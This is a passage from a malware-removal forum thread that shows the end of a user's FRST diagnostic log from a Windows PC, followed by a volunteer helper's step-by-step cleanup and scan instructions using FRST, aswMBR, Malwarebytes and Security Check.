Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe

==================== Loaded Modules (whitelisted) =============

2013-10-11 12:45 - 2012-10-04 19:49 - 00087152 _____ () C:\Windows\System32\cpwmon64.dll
2014-02-28 18:23 - 2012-08-31 16:03 - 00288768 _____ () C:\Windows\System32\HP1100LM.DLL
2014-02-28 18:23 - 2012-08-31 16:02 - 00074240 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1100PP.DLL
2014-02-28 18:23 - 2012-08-31 16:03 - 03034112 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\hp1100su.dll
2014-02-28 18:23 - 2012-08-31 16:02 - 01038336 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\HP1100GC.dll
2012-02-09 16:26 - 2012-02-09 16:26 - 00133632 _____ () C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe
2012-02-09 16:26 - 2012-02-09 16:26 - 00048128 _____ () C:\Program Files\Intel\Intel® Smart Connect Technology Agent\NetworkHeuristic.dll
2012-02-09 16:26 - 2012-02-09 16:26 - 00036864 _____ () C:\Program Files\Intel\Intel® Smart Connect Technology Agent\ISCTNetDetect.dll
2014-02-03 17:43 - 2013-11-04 14:07 - 07651840 _____ () C:\Program Files (x86)\High Meadow Business Solutions\RetailEdge 8.2\Server\RetailEdge_Server_8_0.exe
2013-12-20 12:58 - 2013-12-19 18:03 - 00575488 _____ () C:\Program Files (x86)\IDriveWindows\IDContextMenu.dll
2012-04-16 14:45 - 2012-04-16 14:45 - 00119808 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\updateui.exe
2013-09-25 08:10 - 2012-09-17 01:23 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-09-03 05:55 - 2014-09-03 00:50 - 02832896 _____ () C:\Program Files\AVAST Software\Avast\defs\14090300\algo.dll
2011-08-15 20:12 - 2011-08-15 20:12 - 02603520 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtCore4.dll
2011-08-17 16:48 - 2011-08-17 16:48 - 00322048 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\log4cplus.dll
2011-08-15 20:15 - 2011-08-15 20:15 - 00382464 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtXml4.dll
2011-08-17 16:48 - 2011-08-17 16:48 - 00195584 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\libgsoap.dll
2011-08-15 19:23 - 2011-08-15 19:23 - 00062464 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\zlib1.dll
2012-04-16 11:37 - 2012-04-16 11:37 - 00071680 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\ServiceManagerStarter.dll
2011-08-15 20:12 - 2011-08-15 20:12 - 01006592 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtNetwork4.dll
2011-08-17 16:41 - 2011-08-17 16:41 - 00400384 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\sqlite3.dll
2012-04-16 11:42 - 2012-04-16 11:42 - 00015872 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\featureController.dll
2012-04-16 11:41 - 2012-04-16 11:41 - 00484864 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\DeviceProfile.dll
2012-04-16 11:56 - 2012-04-16 11:56 - 00500032 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\plugin\PServerPlugin.dll
2012-04-16 11:38 - 2012-04-16 11:38 - 00013824 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\eventsSender.dll
2011-07-19 16:05 - 2011-07-19 16:05 - 14978048 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtWebKit4.dll
2011-07-19 16:04 - 2011-07-19 16:04 - 00317952 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\phonon4.dll
2011-08-15 20:17 - 2011-08-15 20:17 - 09224704 _____ () C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\QtGui4.dll
2013-09-14 02:51 - 2013-09-14 02:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 02:50 - 2013-09-14 02:50 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll
2014-02-27 04:05 - 2014-02-27 04:05 - 00017920 _____ () C:\Windows\assembly\NativeImages_v4.0.30319_32\PSIClient\7fb509dd6887788f670fac03bb2f996d\PSIClient.ni.dll
2013-09-25 08:15 - 2012-07-18 06:55 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2014-08-07 15:22 - 2014-07-16 22:42 - 03800688 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
2014-07-09 03:17 - 2014-07-09 03:17 - 17029808 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:373E1720

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (09/03/2014 00:08:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 00:07:04 PM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2

Error: (09/03/2014 11:53:45 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 11:52:44 AM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2

Error: (09/03/2014 11:37:53 AM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = OTL Restore Point - 9/3/2014 10:37:06 AM; Error = 0x800706be).

Error: (09/03/2014 10:37:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: services.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc10e
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24
Exception code: 0xc0000005
Fault offset: 0x0000000000020a7a
Faulting process id: 0x290
Faulting application start time: 0xservices.exe0
Faulting application path: services.exe1
Faulting module path: services.exe2
Report Id: services.exe3

Error: (09/03/2014 10:28:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 10:27:12 AM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2

Error: (09/03/2014 09:58:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 09:57:02 AM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2


System errors:
=============
Error: (09/03/2014 00:07:05 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Util Deal Keeper service failed to start due to the following error:
%%2

Error: (09/03/2014 00:07:05 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Update Deal Keeper service failed to start due to the following error:
%%2

Error: (09/03/2014 00:07:03 PM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows could not resolve the computer name. This could be caused by one of more of the following:
a) Name Resolution failure on the current domain controller.
b) Active Directory Replication Latency (an account created on another domain controller has not replicated to the current domain controller).

Error: (09/03/2014 00:07:02 PM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain BRESSMAN due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.



ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (09/03/2014 11:52:44 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Util Deal Keeper service failed to start due to the following error:
%%2

Error: (09/03/2014 11:52:44 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Update Deal Keeper service failed to start due to the following error:
%%2

Error: (09/03/2014 11:52:40 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The IDriveService service failed to start due to the following error:
%%1053

Error: (09/03/2014 11:52:40 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the IDriveService service to connect.

Error: (09/03/2014 11:52:11 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows could not resolve the computer name. This could be caused by one of more of the following:
a) Name Resolution failure on the current domain controller.
b) Active Directory Replication Latency (an account created on another domain controller has not replicated to the current domain controller).

Error: (09/03/2014 11:52:10 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain BRESSMAN due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.



ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.


Microsoft Office Sessions:
=========================
Error: (09/03/2014 00:08:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 00:07:04 PM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2

Error: (09/03/2014 11:53:45 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 11:52:44 AM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2

Error: (09/03/2014 11:37:53 AM) (Source: System Restore) (EventID: 8193) (User: )
Description: C:\Windows\system32\wbem\wmiprvse.exeOTL Restore Point - 9/3/2014 10:37:06 AM0x800706be

Error: (09/03/2014 10:37:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: services.exe6.1.7600.163854a5bc10entdll.dll6.1.7601.18247521eaf24c00000050000000000020a7a29001cfc79c395cc459C:\Windows\system32\services.exeC:\Windows\SYSTEM32\ntdll.dllee607f87-3390-11e4-8aa8-bc5ff496e865

Error: (09/03/2014 10:28:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 10:27:12 AM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2

Error: (09/03/2014 09:58:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/03/2014 09:57:02 AM) (Source: ISCT Agent) (EventID: 1003) (User: )
Description: CAgentState::DoPeriodicSuspendResume    ****Error in initialize NetDetect, status = 0x2


==================== Memory info ===========================

Processor: Intel® Pentium® CPU G2030 @ 3.00GHz
Percentage of memory in use: 29%
Total physical RAM: 7873.46 MB
Available physical RAM: 5523.53 MB
Total Pagefile: 15745.1 MB
Available Pagefile: 13388.98 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:409.81 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BCC49ABD)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

 

 

So far so good!! No pop ups or annoying ads on websites :)


  • 0

#15
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,583 posts

Excellent job. Things look real good. A few more things to fix and check to ensure there is nothing else nefarious lurking around. Please follow the instructions below and let's ensure that we disable your Avast Antivirus prior to running these fixes. Thank you.
 
Step#1 - FRST Fix
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
1. Download attached file and save it to the DesktopAttached File  fixlist.txt   1.14KB   111 downloads
    NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work (in this case...the desktop).
2. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
3. Press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
4. When finished FRST64 will generate a log on the Desktop (Fixlog.txt). Please post the contents of it in your reply.
 

Step#2 - Rootkit Scan
1. Download aswMBR to your desktop.
2. Right-click on aswMBR.exe and select Run as administrator to run it.
3. If you get a question about Virtualization Technology, answer Yes.
4. If you see this question: Would you like to download latest Avast! virus definitions?" say "Yes".
5. Click the "Scan" button to start scan.
6. On completion of the scan click "Save log", save it to your desktop and post in your next reply.
NOTE. aswMBR will create MBR.dat file on your desktop. This is a copy of your MBR. Do NOT delete it.


Step#3 - Malwarebytes Scan

  • Download Malwarebytes to your desktop from here.
  • Right-click on the file that is downloaded to your desktop and select Run as administrator.
  • Select the appropriate language and click OK.
  • Click Next.
  • Select "I accept the agreement" and click Next.
  • Click Next
  • Change the install path if desired. Normally you will keep this as is. Click Next.
  • Click Next again.
  • Click Next again.
  • Click Install.
  • Uncheck "Enable free trial of Malwarebytes Anti-Malware Premium".
  • Click Finish
  • If an update is found you will be prompted to download and install. Go ahead.
  • Click the Scan button at the top of the form and then click Scan Now.
    2.JPG
  • Once the scan completes click the View detailed log link.
    3.JPG
  • Then click the Copy to clipboard button and paste into your next post.
    4.JPG

 

Step#4 - Security Check

1. Download Security Check from here or here.
2. Save it to your Desktop.
3. Right-click on SecurityCheck.exe and select Run as administrator. Follow the onscreen instructions inside of the black box.
4. A Notepad document should open automatically called checkup.txt; please post the contents of that document.
Note: Don't be alarmed if the process runs for 10 to 15 minutes before completing. If it runs for over 30 minutes, just close the program and try running it again.

 

  

 

Items for your next post
1. FRST Fix Log

2. Rootkit Scan log

3. Malwarebytes log

4. Security Check log


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP